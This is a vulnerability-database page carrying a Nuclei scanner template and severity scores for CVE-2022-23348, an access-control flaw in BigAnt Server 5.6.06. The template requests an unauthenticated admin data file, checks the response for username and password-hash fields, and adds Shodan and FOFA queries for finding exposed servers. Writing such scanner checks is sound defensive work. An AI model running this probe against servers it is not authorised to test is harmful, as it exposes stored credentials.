Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-23348
HistoryAug 05, 2022 - 5:58 a.m.

BigAnt Server 5.6.06 - Improper Access Control

2022-08-0505:58:38
ProjectDiscovery
github.com
22
bigant
server
accesscontrol
weakpassword
unauthorizedζ“δ½œ

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

AI Score

5.5

Confidence

High

EPSS

0.004

Percentile

73.3%

BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
id: CVE-2022-23348

info:
  name: BigAnt Server 5.6.06 - Improper Access Control
  author: arafatansari
  severity: medium
  description: |
    BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the access control issue.
  reference:
    - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23348
    - http://bigant.com
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23348
    - https://www.bigantsoft.com/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-23348
    cwe-id: CWE-916
    epss-score: 0.00425
    epss-percentile: 0.71717
    cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bigantsoft
    product: bigant_server
    shodan-query: http.html:"bigant"
    fofa-query: body="bigant"
  tags: cve,cve2022,bigant,unauth,exposure,bigantsoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/Runtime/Data/ms_admin.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"user_name";'
          - '"user_pwd";'
          - '"user_id";'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f84da5aa508bfc28b45cb4c63c92c00fbaa24a9310cd3bf5c07da543b03daf4f02210097de4e1bf77936efec5aa586160e9684ffa53aeaed05c7bd0bb55703268cbd09:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

AI Score

5.5

Confidence

High

EPSS

0.004

Percentile

73.3%

Related for NUCLEI:CVE-2022-23348